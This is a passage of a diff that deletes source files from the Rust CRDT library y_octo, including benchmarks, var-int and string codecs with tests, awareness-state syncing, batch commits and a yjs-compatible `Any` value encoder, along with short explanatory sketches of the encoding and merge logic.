for i in 0..(BENCHMARK_SIZE as i32) {
let (tail, num) = read_var_i32(decoder).unwrap();
decoder = tail;
assert_eq!(num, i);
}
})
});
}
{
codec_group.bench_function("jwst encode var_uint (32 bit)", |b| {
b.iter(|| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..BENCHMARK_SIZE {
write_var_u64(&mut encoder, i as u64).unwrap();
}
})
});
codec_group.bench_function("jwst decode var_uint (32 bit)", |b| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..BENCHMARK_SIZE {
write_var_u64(&mut encoder, i as u64).unwrap();
}
b.iter(|| {
let mut decoder = encoder.as_slice();
for i in 0..BENCHMARK_SIZE {
let (tail, num) = read_var_u64(decoder).unwrap();
decoder = tail;
assert_eq!(num as u32, i);
}
})
});
}
{
codec_group.bench_function("jwst encode var_uint (64 bit)", |b| {
b.iter(|| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..(BENCHMARK_SIZE as u64) {
write_var_u64(&mut encoder, i).unwrap();
}
})
});
codec_group.bench_function("jwst decode var_uint (64 bit)", |b| {
let mut encoder = Vec::with_capacity(BENCHMARK_SIZE as usize * 8);
for i in 0..(BENCHMARK_SIZE as u64) {
write_var_u64(&mut encoder, i).unwrap();
}
b.iter(|| {
let mut decoder = encoder.as_slice();
for i in 0..(BENCHMARK_SIZE as u64) {
let (tail, num) = read_var_u64(decoder).unwrap();
decoder = tail;
assert_eq!(num, i);
}
})
});
}
}
criterion_group!(benches, codec);
criterion_main!(benches);
@@ -1,65 +0,0 @@
use std::time::Duration;
use criterion::{Criterion, criterion_group, criterion_main};
fn operations(c: &mut Criterion) {
let mut group = c.benchmark_group("ops/map");
group.measurement_time(Duration::from_secs(15));
group.bench_function("jwst/insert", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9"
.split(' ')
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut map = doc.get_or_create_map("test").unwrap();
for (idx, key) in base_text.iter().enumerate() {
map.insert(key.to_string(), idx).unwrap();
}
});
});
group.bench_function("jwst/get", |b| {
use y_octo::*;
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9"
.split(' ')
.collect::<Vec<_>>();
let doc = Doc::default();
let mut map = doc.get_or_create_map("test").unwrap();
for (idx, key) in base_text.iter().enumerate() {
map.insert(key.to_string(), idx).unwrap();
}
b.iter(|| {
for key in &base_text {
map.get(key);
}
});
});
group.bench_function("jwst/remove", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9"
.split(' ')
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut map = doc.get_or_create_map("test").unwrap();
for (idx, key) in base_text.iter().enumerate() {
map.insert(key.to_string(), idx).unwrap();
}
for key in &base_text {
map.remove(key);
}
});
});
group.finish();
}
criterion_group!(benches, operations);
criterion_main!(benches);
@@ -1,50 +0,0 @@
use std::time::Duration;
use criterion::{Criterion, criterion_group, criterion_main};
use rand::{Rng, SeedableRng};
fn operations(c: &mut Criterion) {
let mut group = c.benchmark_group("ops/text");
group.measurement_time(Duration::from_secs(15));
group.bench_function("jwst/insert", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
let mut rng = rand_chacha::ChaCha20Rng::seed_from_u64(1234);
let idxs = (0..99)
.map(|_| rng.random_range(0..base_text.len() as u64))
.collect::<Vec<_>>();
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, base_text).unwrap();
for idx in &idxs {
text.insert(*idx, "test").unwrap();
}
});
});
group.bench_function("jwst/remove", |b| {
let base_text = "test1 test2 test3 test4 test5 test6 test7 test8 test9";
b.iter(|| {
use y_octo::*;
let doc = Doc::default();
let mut text = doc.get_or_create_text("test").unwrap();
text.insert(0, base_text).unwrap();
text.insert(0, base_text).unwrap();
text.insert(0, base_text).unwrap();
for idx in (0..base_text.len() as u64).rev() {
text.remove(idx, 1).unwrap();
}
});
});
group.finish();
}
criterion_group!(benches, operations);
criterion_main!(benches);
@@ -1,34 +0,0 @@
mod utils;
use std::time::Duration;
use criterion::{BenchmarkId, Criterion, Throughput, criterion_group, criterion_main};
use path_ext::PathExt;
use utils::Files;
fn update(c: &mut Criterion) {
let files = Files::load();
let mut group = c.benchmark_group("update");
group.measurement_time(Duration::from_secs(15));
for file in &files.files {
group.throughput(Throughput::Bytes(file.content.len() as u64));
group.bench_with_input(
BenchmarkId::new("parse with jwst", file.path.name_str()),
&file.content,
|b, content| {
b.iter(|| {
use y_octo::*;
let mut decoder = RawDecoder::new(content);
Update::read(&mut decoder).unwrap()
});
},
);
}
group.finish();
}
criterion_group!(benches, update);
criterion_main!(benches);
@@ -1,42 +0,0 @@
use std::{
fs::{read, read_dir},
path::{Path, PathBuf},
};
use path_ext::PathExt;
pub struct File {
pub path: PathBuf,
pub content: Vec<u8>,
}
const BASE: &str = "src/fixtures/";
impl File {
fn new(path: &Path) -> Self {
let content = read(path).unwrap();
Self {
path: path.into(),
content,
}
}
}
pub struct Files {
pub files: Vec<File>,
}
impl Files {
pub fn load() -> Self {
let path = PathBuf::from(env!("CARGO_MANIFEST_DIR")).join(BASE);
let files = read_dir(path).unwrap();
let files = files
.flatten()
.filter(|f| f.path().is_file() && f.path().ext_str() == "bin")
.map(|f| File::new(&f.path()))
.collect::<Vec<_>>();
Self { files }
}
}
@@ -1,3 +0,0 @@
mod files;
pub use files::Files;
@@ -1,78 +0,0 @@
use std::io::{Error, Write};
use nom::bytes::complete::take;
use super::*;
pub fn read_var_buffer(input: &[u8]) -> IResult<&[u8], &[u8]> {
let (tail, len) = read_var_u64(input)?;
let (tail, val) = take(len as usize)(tail)?;
Ok((tail, val))
}
pub fn write_var_buffer<W: Write>(buffer: &mut W, data: &[u8]) -> Result<(), Error> {
write_var_u64(buffer, data.len() as u64)?;
buffer.write_all(data)?;
Ok(())
}
#[cfg(test)]
mod tests {
use nom::{
AsBytes, Err,
error::{Error, ErrorKind},
};
use super::*;
#[test]
fn test_read_var_buffer() {
// Test case 1: valid input, buffer length = 5
let input = [0x05, 0x01, 0x02, 0x03, 0x04, 0x05];
let expected_output = [0x01, 0x02, 0x03, 0x04, 0x05];
let result = read_var_buffer(&input);
assert_eq!(result, Ok((&[][..], &expected_output[..])));
// Test case 2: truncated input, missing buffer
let input = [0x05, 0x01, 0x02, 0x03];
let result = read_var_buffer(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[1..], ErrorKind::Eof))));
// Test case 3: invalid input
let input = [0xFF, 0x01, 0x02, 0x03];
let result = read_var_buffer(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[2..], ErrorKind::Eof))));
// Test case 4: invalid var int encoding
let input = [0xFF, 0x80, 0x80, 0x80, 0x80, 0x80, 0x01];
let result = read_var_buffer(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[7..], ErrorKind::Eof))));
}
#[test]
fn test_var_buf_codec() {
test_var_buf_enc_dec(&[]);
test_var_buf_enc_dec(&[0x01, 0x02, 0x03, 0x04, 0x05]);
test_var_buf_enc_dec(b"test_var_buf_enc_dec");
#[cfg(not(miri))]
{
use rand::{Rng, rng};
let mut rng = rng();
for _ in 0..100 {
test_var_buf_enc_dec(&{
let mut bytes = vec![0u8; rng.random_range(0..u16::MAX as usize)];
rng.fill(&mut bytes[..]);
bytes
});
}
}
}
fn test_var_buf_enc_dec(data: &[u8]) {
let mut buf = Vec::<u8>::new();
write_var_buffer(&mut buf, data).unwrap();
let result = read_var_buffer(buf.as_bytes());
assert_eq!(result, Ok((&[][..], data)));
}
}
@@ -1,166 +0,0 @@
use std::io::{Error, Write};
use byteorder::WriteBytesExt;
use nom::Needed;
use super::*;
pub fn read_var_u64(input: &[u8]) -> IResult<&[u8], u64> {
// parse the first byte
if let Some(next_byte) = input.first() {
let mut shift = 7;
let mut curr_byte = *next_byte;
let mut rest = &input[1..];
// same logic in loop, but enable early exit when dealing with small numbers
let mut num = (curr_byte & 0b0111_1111) as u64;
// if the continuation bit (the high bit) is set, more bytes follow
while (curr_byte >> 7) & 0b1 != 0 {
if let Some(next_byte) = rest.first() {
curr_byte = *next_byte;
// add the remaining 7 bits to the number
num |= ((curr_byte & 0b0111_1111) as u64).wrapping_shl(shift);
shift += 7;
rest = &rest[1..];
} else {
return Err(nom::Err::Incomplete(Needed::new(input.len() + 1)));
}
}
Ok((rest, num))
} else {
Err(nom::Err::Incomplete(Needed::new(1)))
}
}
pub fn write_var_u64<W: Write>(buffer: &mut W, mut num: u64) -> Result<(), Error> {
// emit 7 bits at a time, setting the continuation bit (0b1000_0000) while more bits remain
while num >= 0b10000000 {
buffer.write_u8(num as u8 & 0b0111_1111 | 0b10000000)?;
num >>= 7;
}
buffer.write_u8((num & 0b01111111) as u8)?;
Ok(())
}
pub fn read_var_i32(input: &[u8]) -> IResult<&[u8], i32> {
// parse the first byte
if let Some(next_byte) = input.first() {
let mut shift = 6;
let mut curr_byte = *next_byte;
let mut rest: &[u8] = &input[1..];
// get the sign bit and the first 6 bits of the number
let sign_bit = (curr_byte >> 6) & 0b1;
let mut num = (curr_byte & 0b0011_1111) as i64;
// if the continuation bit (the high bit) is set, more bytes follow
while (curr_byte >> 7) & 0b1 != 0 {
if let Some(next_byte) = rest.first() {
curr_byte = *next_byte;
// add the remaining 7 bits to the number
num |= ((curr_byte & 0b0111_1111) as i64).wrapping_shl(shift);
shift += 7;
rest = &rest[1..];
} else {
return Err(nom::Err::Incomplete(Needed::new(input.len() + 1)));
}
}
// negate the number if the sign bit is set
if sign_bit == 1 {
num = -num;
}
Ok((rest, num as i32))
} else {
Err(nom::Err::Incomplete(Needed::new(1)))
}
}
pub fn write_var_i32<W: Write>(buffer: &mut W, num: i32) -> Result<(), Error> {
let mut num = num as i64;
let is_negative = num < 0;
if is_negative {
num = -num;
}
buffer.write_u8(
// set the continuation bit (0b1000_0000) if more bytes follow
if num > 0b00111111 { 0b10000000 } else { 0 }
// set the sign bit (0b0100_0000) if the number is negative
| if is_negative { 0b0100_0000 } else { 0 }
// store the lowest 6 bits of the magnitude
| num as u8 & 0b0011_1111,
)?;
num >>= 6;
while num > 0 {
buffer.write_u8(
// set the continuation bit (0b1000_0000) if more bytes follow
if num > 0b01111111 { 0b10000000 } else { 0 }
// store the next 7 bits of the magnitude
| num as u8 & 0b0111_1111,
)?;
num >>= 7;
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
fn test_var_uint_enc_dec(num: u64) {
let mut buf = Vec::new();
write_var_u64(&mut buf, num).unwrap();
let (rest, decoded_num) = read_var_u64(&buf).unwrap();
assert_eq!(num, decoded_num);
assert_eq!(rest.len(), 0);
}
fn test_var_int_enc_dec(num: i32) {
{
let mut buf = Vec::new();
write_var_i32(&mut buf, num).unwrap();
let (rest, decoded_num) = read_var_i32(&buf).unwrap();
assert_eq!(num, decoded_num);
assert_eq!(rest.len(), 0);
}
}
#[test]
fn test_var_uint_codec() {
test_var_uint_enc_dec(0);
test_var_uint_enc_dec(1);
test_var_uint_enc_dec(127);
test_var_uint_enc_dec(0b1000_0000);
test_var_uint_enc_dec(0b1_0000_0000);
test_var_uint_enc_dec(0b1_1111_1111);
test_var_uint_enc_dec(0b10_0000_0000);
test_var_uint_enc_dec(0b11_1111_1111);
test_var_uint_enc_dec(0x7fff_ffff_ffff_ffff);
test_var_uint_enc_dec(u64::MAX);
}
#[test]
fn test_var_int() {
test_var_int_enc_dec(0);
test_var_int_enc_dec(1);
test_var_int_enc_dec(-1);
test_var_int_enc_dec(63);
test_var_int_enc_dec(-63);
test_var_int_enc_dec(64);
test_var_int_enc_dec(-64);
test_var_int_enc_dec(i32::MAX);
test_var_int_enc_dec(i32::MIN);
test_var_int_enc_dec(((1 << 20) - 1) * 8);
test_var_int_enc_dec(-((1 << 20) - 1) * 8);
}
}
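
The signed layout used by `write_var_i32` / `read_var_i32` above differs from the unsigned one only in the first byte: bit 7 is the continuation flag, bit 6 is the sign, and the low 6 bits hold the start of the magnitude. A std-only sketch of that layout follows. It is an illustration under simplified assumptions (a `Vec<u8>` sink and `Option` instead of the crate's `Write` / `IResult` types), not the crate's implementation.

```rust
/// Encode `num` as sign + magnitude: the first byte carries 6 magnitude bits,
/// the sign in bit 6, and the continuation flag in bit 7; later bytes carry
/// 7 magnitude bits each.
fn write_var_i32(out: &mut Vec<u8>, num: i32) {
    let negative = num < 0;
    // Widen to i64 first so that i32::MIN has a representable magnitude.
    let mut mag = (num as i64).unsigned_abs();
    let mut first = (mag & 0x3f) as u8;
    if negative {
        first |= 0x40;
    }
    mag >>= 6;
    if mag > 0 {
        first |= 0x80;
    }
    out.push(first);
    while mag > 0 {
        let mut byte = (mag & 0x7f) as u8;
        mag >>= 7;
        if mag > 0 {
            byte |= 0x80;
        }
        out.push(byte);
    }
}

/// Decode one value from the front of `input`, returning it with the unread
/// tail, or `None` on truncated input or a value outside the i32 range.
fn read_var_i32(input: &[u8]) -> Option<(i32, &[u8])> {
    let (&first, mut rest) = input.split_first()?;
    let negative = first & 0x40 != 0;
    let mut mag = (first & 0x3f) as i64;
    let mut shift = 6u32;
    let mut more = first & 0x80 != 0;
    while more {
        // An i32 magnitude never needs more than four continuation bytes.
        if shift > 27 {
            return None;
        }
        let (&byte, tail) = rest.split_first()?;
        mag |= ((byte & 0x7f) as i64) << shift;
        shift += 7;
        more = byte & 0x80 != 0;
        rest = tail;
    }
    let value = if negative { -mag } else { mag };
    i32::try_from(value).ok().map(|v| (v, rest))
}
```

Under this layout `-1` encodes as the single byte `0x41` and `64` as `0x80 0x01`, since 64 no longer fits in the 6 bits of the first byte.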
@@ -1,9 +0,0 @@
mod buffer;
mod integer;
mod string;
pub use buffer::{read_var_buffer, write_var_buffer};
pub use integer::{read_var_i32, read_var_u64, write_var_i32, write_var_u64};
pub use string::{read_var_string, write_var_string};
use super::*;
@@ -1,75 +0,0 @@
use std::io::{Error, Write};
use nom::{Parser, combinator::map_res};
use super::*;
pub fn read_var_string(input: &[u8]) -> IResult<&[u8], String> {
map_res(read_var_buffer, |s| String::from_utf8(s.to_vec())).parse(input)
}
pub fn write_var_string<W: Write, S: AsRef<str>>(buffer: &mut W, input: S) -> Result<(), Error> {
let bytes = input.as_ref().as_bytes();
write_var_buffer(buffer, bytes)?;
Ok(())
}
#[cfg(test)]
mod tests {
use nom::{
AsBytes, Err,
error::{Error, ErrorKind},
};
use super::*;
#[test]
fn test_read_var_string() {
// Test case 1: valid input, string length = 5
let input = [0x05, 0x68, 0x65, 0x6C, 0x6C, 0x6F];
let expected_output = "hello".to_string();
let result = read_var_string(&input);
assert_eq!(result, Ok((&[][..], expected_output)));
// Test case 2: missing string length
let input = [0x68, 0x65, 0x6C, 0x6C, 0x6F];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[1..], ErrorKind::Eof))));
// Test case 3: truncated input
let input = [0x05, 0x68, 0x65, 0x6C, 0x6C];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[1..], ErrorKind::Eof))));
// Test case 4: invalid input
let input = [0xFF, 0x01, 0x02, 0x03, 0x04];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[2..], ErrorKind::Eof))));
// Test case 5: invalid var int encoding
let input = [0xFF, 0x80, 0x80, 0x80, 0x80, 0x80, 0x01];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[7..], ErrorKind::Eof))));
// Test case 6: invalid input, invalid UTF-8 encoding
let input = [0x05, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF];
let result = read_var_string(&input);
assert_eq!(result, Err(Err::Error(Error::new(&input[..], ErrorKind::MapRes))));
}
#[test]
fn test_var_str_codec() {
test_var_str_enc_dec("".to_string());
test_var_str_enc_dec(" ".to_string());
test_var_str_enc_dec("abcde".to_string());
test_var_str_enc_dec("🃒🃓🃟☗🀥🀫∺∼≂≇⓵➎⓷➏‍".to_string());
}
fn test_var_str_enc_dec(input: String) {
let mut buf = Vec::<u8>::new();
write_var_string(&mut buf, input.clone()).unwrap();
let (rest, decoded_str) = read_var_string(buf.as_bytes()).unwrap();
assert_eq!(decoded_str, input);
assert_eq!(rest.len(), 0);
}
}
@@ -1,240 +0,0 @@
use std::{cmp::max, collections::hash_map::Entry};
use super::*;
use crate::sync::Arc;
pub type AwarenessCallback = Arc<dyn Fn(&Awareness, AwarenessEvent) + Send + Sync + 'static>;
pub struct Awareness {
awareness: AwarenessStates,
callback: Option<AwarenessCallback>,
local_id: u64,
}
impl Awareness {
pub fn new(local_id: u64) -> Self {
Self {
awareness: AwarenessStates::new(),
callback: None,
local_id,
}
}
pub fn local_id(&self) -> u64 {
self.local_id
}
pub fn on_update(&mut self, f: impl Fn(&Awareness, AwarenessEvent) + Send + Sync + 'static) {
self.callback = Some(Arc::new(f));
}
pub fn get_states(&self) -> &AwarenessStates {
&self.awareness
}
pub fn get_local_state(&self) -> Option<String> {
self.awareness.get(&self.local_id).map(|state| state.content.clone())
}
fn mut_local_state(&mut self) -> &mut AwarenessState {
self.awareness.entry(self.local_id).or_default()
}
pub fn set_local_state(&mut self, content: String) {
self.mut_local_state().set_content(content);
if let Some(cb) = self.callback.as_ref() {
cb(self, AwarenessEventBuilder::new().update(self.local_id).build());
}
}
pub fn clear_local_state(&mut self) {
self.mut_local_state().delete();
if let Some(cb) = self.callback.as_ref() {
cb(self, AwarenessEventBuilder::new().remove(self.local_id).build());
}
}
pub fn apply_update(&mut self, update: AwarenessStates) {
let mut event = AwarenessEventBuilder::new();
for (client_id, state) in update {
match self.awareness.entry(client_id) {
Entry::Occupied(mut entry) => {
let prev_state = entry.get_mut();
if client_id == self.local_id {
// a remote update about the local client is not applied; instead, bump
// the local clock past the remote one so the local state overrides it
prev_state.set_clock(max(prev_state.clock, state.clock) + 1);
event.update(client_id);
continue;
}
if prev_state.clock < state.clock {
if state.is_deleted() {
prev_state.delete();
event.remove(client_id);
} else {
*prev_state = state;
event.update(client_id);
}
}
}
Entry::Vacant(entry) => {
entry.insert(state);
event.add(client_id);
}
}
}
if let Some(cb) = self.callback.as_ref() {
cb(self, event.build());
}
}
}
pub struct AwarenessEvent {
added: Vec<u64>,
updated: Vec<u64>,
removed: Vec<u64>,
}
impl AwarenessEvent {
pub fn get_updated(&self, states: &AwarenessStates) -> AwarenessStates {
states
.iter()
.filter(|(id, _)| self.added.contains(id) || self.updated.contains(id) || self.removed.contains(id))
.map(|(id, state)| (*id, state.clone()))
.collect()
}
}
struct AwarenessEventBuilder {
added: Vec<u64>,
updated: Vec<u64>,
removed: Vec<u64>,
}
impl AwarenessEventBuilder {
fn new() -> Self {
Self {
added: Vec::new(),
updated: Vec::new(),
removed: Vec::new(),
}
}
fn add(&mut self, client_id: u64) -> &mut Self {
self.added.push(client_id);
self
}
fn update(&mut self, client_id: u64) -> &mut Self {
self.updated.push(client_id);
self
}
fn remove(&mut self, client_id: u64) -> &mut Self {
self.removed.push(client_id);
self
}
fn build(&mut self) -> AwarenessEvent {
AwarenessEvent {
added: self.added.clone(),
updated: self.updated.clone(),
removed: self.removed.clone(),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::sync::{Mutex, MutexGuard};
#[test]
fn test_awareness() {
loom_model!({
let mut awareness = Awareness::new(0);
{
// init state
assert_eq!(awareness.local_id, 0);
assert_eq!(awareness.awareness.len(), 0);
}
{
// local state
awareness.set_local_state("test".to_string());
assert_eq!(awareness.get_local_state(), Some("test".to_string()));
awareness.clear_local_state();
assert_eq!(awareness.get_local_state(), Some("null".to_string()));
}
{
// apply remote update
let mut states = AwarenessStates::new();
states.insert(0, AwarenessState::new(2, "test0".to_string()));
states.insert(1, AwarenessState::new(2, "test1".to_string()));
awareness.apply_update(states);
assert!(awareness.get_states().contains_key(&1));
// local state will not apply
assert_eq!(awareness.get_states().get(&0).unwrap().content, "null".to_string());
assert_eq!(awareness.get_states().get(&1).unwrap().content, "test1".to_string());
}
{
// callback
let values: Arc<Mutex<Vec<AwarenessEvent>>> = Arc::new(Mutex::new(Vec::new()));
let callback_values = Arc::clone(&values);
awareness.on_update(move |_, event| {
let mut values = callback_values.lock().unwrap();
values.push(event);
});
let mut new_states = AwarenessStates::new();
// already exists in local awareness: update
new_states.insert(1, AwarenessState::new(3, "test update".to_string()));
// does not exist in local awareness: add
new_states.insert(2, AwarenessState::new(1, "test update".to_string()));
// does not exist in local awareness: add
new_states.insert(3, AwarenessState::new(1, "null".to_string()));
// does not exist in local awareness: add
new_states.insert(4, AwarenessState::new(1, "test update".to_string()));
awareness.apply_update(new_states);
let mut new_states = AwarenessStates::new();
// exists in local awareness: delete
new_states.insert(4, AwarenessState::new(2, "null".to_string()));
awareness.apply_update(new_states);
awareness.set_local_state("test".to_string());
awareness.clear_local_state();
let values: MutexGuard<Vec<AwarenessEvent>> = values.lock().unwrap();
assert_eq!(values.len(), 4);
let event = values.first().unwrap();
let mut added = event.added.clone();
added.sort();
assert_eq!(added, [2, 3, 4]);
assert_eq!(event.updated, [1]);
assert_eq!(
event.get_updated(awareness.get_states()).get(&1).unwrap(),
&AwarenessState::new(3, "test update".to_string())
);
let event = values.get(1).unwrap();
assert_eq!(event.removed, [4]);
let event = values.get(2).unwrap();
assert_eq!(event.updated, [0]);
let event = values.get(3).unwrap();
assert_eq!(event.removed, [0]);
}
});
}
}
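
The merge rule in `Awareness::apply_update` above can be sketched with std types only. `State` and the free function below are hypothetical stand-ins for `AwarenessState` and the method. Deletion handling and the callback are left out, so this shows only the clock comparison, not the full behavior.

```rust
use std::collections::hash_map::Entry;
use std::collections::HashMap;

/// Hypothetical stand-in for `AwarenessState`: a logical clock plus a payload.
#[derive(Debug, Clone, PartialEq)]
struct State {
    clock: u64,
    content: String,
}

/// Merge `update` into `states`, returning the ids that were (added, updated).
fn apply_update(
    states: &mut HashMap<u64, State>,
    local_id: u64,
    update: HashMap<u64, State>,
) -> (Vec<u64>, Vec<u64>) {
    let (mut added, mut updated) = (Vec::new(), Vec::new());
    for (id, incoming) in update {
        match states.entry(id) {
            Entry::Occupied(mut entry) => {
                let current = entry.get_mut();
                if id == local_id {
                    // Keep the local content, but move the clock past the
                    // remote one so the local state wins on the next sync.
                    current.clock = current.clock.max(incoming.clock) + 1;
                    updated.push(id);
                } else if current.clock < incoming.clock {
                    // Only strictly newer remote states replace what we hold.
                    *current = incoming;
                    updated.push(id);
                }
            }
            Entry::Vacant(entry) => {
                entry.insert(incoming);
                added.push(id);
            }
        }
    }
    (added, updated)
}
```

A stale remote state (lower or equal clock) is dropped silently, which makes applying the same update twice harmless for remote clients.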
@@ -1,119 +0,0 @@
use super::*;
#[derive(Debug, PartialEq)]
pub struct Batch {
doc: Doc,
before_state: StateVector,
after_state: StateVector,
changed: HashMap<YTypeRef, Vec<SmolStr>>,
}
impl Batch {
pub fn new(doc: Doc) -> Self {
let current_state = doc.get_state_vector();
Batch {
doc,
before_state: current_state.clone(),
after_state: current_state,
changed: HashMap::new(),
}
}
pub fn with_batch<T, F>(&mut self, f: F) -> T
where
F: FnOnce(Doc) -> T,
{
let ret = f(self.doc.clone());
for (k, v) in self.doc.get_changed() {
self.changed.entry(k).or_default().extend(v.iter().cloned());
}
ret
}
}
pub fn batch_commit<T, F>(mut doc: Doc, f: F) -> Option<T>
where
F: FnOnce(Doc) -> T,
{
// Initialize batch cleanups list
let mut batch_cleanups = vec![];
// Initial call and result initialization
let mut initial_call = false;
{
if doc.batch.is_none() {
initial_call = true;
// Start a new batch
let batch = Batch::new(doc.clone());
doc.batch = Somr::new(batch);
batch_cleanups.push(doc.batch.clone());
}
}
let batch = doc.batch.get_mut()?;
let result = Some(batch.with_batch(f));
if initial_call
&& let Some(current_batch) = doc.batch.get()
&& Some(current_batch) == batch_cleanups[0].get()
{
// Process observer calls and perform cleanup if this is the initial call
cleanup_batches(&mut batch_cleanups);
doc.batch.swap_take();
}
result
}
fn cleanup_batches(batch_cleanups: &mut Vec<Somr<Batch>>) {
for batch in batch_cleanups.drain(..) {
if let Some(batch) = batch.get() {
println!("changed: {:?}", batch.changed);
} else {
panic!("Batch not initialized");
}
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn should_get_changed_items() {
loom_model!({
let doc = DocOptions::new().with_client_id(1).build();
batch_commit(doc.clone(), |d| {
let mut arr = d.get_or_create_array("arr").unwrap();
let mut text = d.create_text().unwrap();
let mut map = d.create_map().unwrap();
batch_commit(doc.clone(), |_| {
arr.insert(0, Value::from(text.clone())).unwrap();
arr.insert(1, Value::from(map.clone())).unwrap();
});
batch_commit(doc.clone(), |_| {
text.insert(0, "hello world").unwrap();
text.remove(5, 6).unwrap();
});
batch_commit(doc.clone(), |_| {
map.insert("key".into(), 123).unwrap();
});
batch_commit(doc.clone(), |_| {
map.remove("key");
});
batch_commit(doc.clone(), |_| {
arr.remove(0, 1).unwrap();
});
});
});
}
}
@@ -1,691 +0,0 @@
use std::{
fmt::{self, Display},
ops::RangeInclusive,
};
use ordered_float::OrderedFloat;
use super::*;
// The largest integer a JS number can represent exactly (2^53 - 1).
const MAX_JS_INT: i64 = 0x001F_FFFF_FFFF_FFFF;
// The smallest integer a JS number can represent exactly.
const MIN_JS_INT: i64 = -MAX_JS_INT;
pub const JS_INT_RANGE: RangeInclusive<i64> = MIN_JS_INT..=MAX_JS_INT;
#[derive(Debug, Clone, PartialEq)]
#[cfg_attr(fuzzing, derive(arbitrary::Arbitrary))]
#[cfg_attr(test, derive(proptest_derive::Arbitrary))]
pub enum Any {
Undefined,
Null,
Integer(i32),
Float32(OrderedFloat<f32>),
Float64(OrderedFloat<f64>),
BigInt64(i64),
False,
True,
String(String),
// FIXME: due to macro's overflow evaluating, we can't use proptest here
#[cfg_attr(test, proptest(skip))]
Object(HashMap<String, Any>),
#[cfg_attr(test, proptest(skip))]
Array(Vec<Any>),
Binary(Vec<u8>),
}
impl<R: CrdtReader> CrdtRead<R> for Any {
fn read(reader: &mut R) -> JwstCodecResult<Self> {
let index = reader.read_u8()?;
match 127u8.overflowing_sub(index).0 {
0 => Ok(Any::Undefined),
1 => Ok(Any::Null),
// in the yjs implementation, flag 2 only stores 32-bit integers
2 => Ok(Any::Integer(reader.read_var_i32()?)), // Integer
3 => Ok(Any::Float32(reader.read_f32_be()?.into())), // Float32
4 => Ok(Any::Float64(reader.read_f64_be()?.into())), // Float64
5 => Ok(Any::BigInt64(reader.read_i64_be()?)), // BigInt64
6 => Ok(Any::False),
7 => Ok(Any::True),
8 => Ok(Any::String(reader.read_var_string()?)), // String
9 => {
let len = reader.read_var_u64()?;
let object = (0..len)
.map(|_| Self::read_key_value(reader))
.collect::<Result<Vec<_>, _>>()?;
Ok(Any::Object(object.into_iter().collect()))
} // Object
10 => {
let len = reader.read_var_u64()?;
let any = (0..len).map(|_| Self::read(reader)).collect::<Result<Vec<_>, _>>()?;
Ok(Any::Array(any))
} // Array
11 => {
let binary = reader.read_var_buffer()?;
Ok(Any::Binary(binary.to_vec()))
} // Binary
_ => Ok(Any::Undefined),
}
}
}
impl<W: CrdtWriter> CrdtWrite<W> for Any {
fn write(&self, writer: &mut W) -> JwstCodecResult {
match self {
Any::Undefined => writer.write_u8(127)?,
Any::Null => writer.write_u8(127 - 1)?,
Any::Integer(value) => {
writer.write_u8(127 - 2)?;
writer.write_var_i32(*value)?;
}
Any::Float32(value) => {
writer.write_u8(127 - 3)?;
writer.write_f32_be(value.into_inner())?;
}
Any::Float64(value) => {
writer.write_u8(127 - 4)?;
writer.write_f64_be(value.into_inner())?;
}
Any::BigInt64(value) => {
writer.write_u8(127 - 5)?;
writer.write_i64_be(*value)?;
}
Any::False => writer.write_u8(127 - 6)?,
Any::True => writer.write_u8(127 - 7)?,
Any::String(value) => {
writer.write_u8(127 - 8)?;
writer.write_var_string(value)?;
}
Any::Object(value) => {
writer.write_u8(127 - 9)?;
writer.write_var_u64(value.len() as u64)?;
for (key, value) in value {
Self::write_key_value(writer, key, value)?;
}
}
Any::Array(values) => {
writer.write_u8(127 - 10)?;
writer.write_var_u64(values.len() as u64)?;
for value in values {
value.write(writer)?;
}
}
Any::Binary(value) => {
writer.write_u8(127 - 11)?;
writer.write_var_buffer(value)?;
}
}
Ok(())
}
}
impl Any {
fn read_key_value<R: CrdtReader>(reader: &mut R) -> JwstCodecResult<(String, Any)> {
let key = reader.read_var_string()?;
let value = Self::read(reader)?;
Ok((key, value))
}
fn write_key_value<W: CrdtWriter>(writer: &mut W, key: &str, value: &Any) -> JwstCodecResult {
writer.write_var_string(key)?;
value.write(writer)?;
Ok(())
}
pub(crate) fn read_multiple<R: CrdtReader>(reader: &mut R) -> JwstCodecResult<Vec<Any>> {
let len = reader.read_var_u64()? as usize;
let mut vec = Vec::with_capacity(len);
for _ in 0..len {
vec.push(Any::read(reader)?);
}
Ok(vec)
}
pub(crate) fn write_multiple<W: CrdtWriter>(writer: &mut W, any: &[Any]) -> JwstCodecResult {
writer.write_var_u64(any.len() as u64)?;
for value in any {
value.write(writer)?;
}
Ok(())
}
}
macro_rules! impl_primitive_from {
(unsigned, $($ty: ty),*) => {
$(
impl From<$ty> for Any {
fn from(value: $ty) -> Self {
// INFO: values in `i64::MAX < value <= u64::MAX` wrap to negative numbers in this cast;
// the yjs binary format does not handle integers that exceed the i64 range
let int: i64 = value as i64;
// handle the behavior same as yjs
if JS_INT_RANGE.contains(&int) {
if int <= i32::MAX as i64 {
Self::Integer(int as i32)
} else if int as f32 as i64 == int {
Self::Float32((int as f32).into())
} else {
Self::Float64((int as f64).into())
}
} else {
